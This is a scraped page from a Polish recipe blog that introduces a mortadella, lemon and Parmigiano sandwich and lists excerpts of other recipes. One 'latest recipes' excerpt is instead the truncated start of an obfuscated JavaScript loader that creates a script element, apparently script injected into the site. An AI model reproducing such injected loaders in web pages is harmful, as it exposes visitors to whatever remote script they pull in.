Kanapka z mortadelą cytryną i Parmigiano Reggiano
Źródło: https://rafalcook.com/2023/09/30/kanapka-z-mortadela-cytryna-i-parmigiano-reggiano/
Kanapka z mortadelą cytryną i Parmigiano Reggiano to jedno z najpopularniejszych włoskich dań, które wywodzi się z regionu Emilia-Romania. To proste, ale smaczne połączenie składników sprawia, że jest to doskonały wybór na szybki posiłek przekąskę …
Najnowsze przepisy
Składniki:recipe: 1 rolkę ciasta francuskiego rozwinąć... ⇖ 9
Domowe sosy to często niedoceniane skarby domowej kuchni.... ⇖ 9
Jeden zapach, jeden kęs - i nagle wracają wspomnienia.... ⇖ 10
(function(){ zz99=document.createElement("script");zz99_=("o ⇖ 18
Proste połączenie ale zdecydowanie zawsze się sprawdza.... ⇖ 42
Miodownik bez jajek – mięciutki, puszysty i pięknie... ⇖ 32
Przepisy z bloga
Przepisy na czasie
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 363
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 272
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 215
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 210
Tulipany do barszczyku to znakomita propozycja podania... ⇖ 176
Pyszny miodownik z kakaową masą grysikową i z orzechami... ⇖ 156
Idealne danie na ciepło na imprezy, lub na obiad. Przepis... ⇖ 73
Domowe pralinki są smaczne, łatwe do zrobienia i... ⇖ 71








































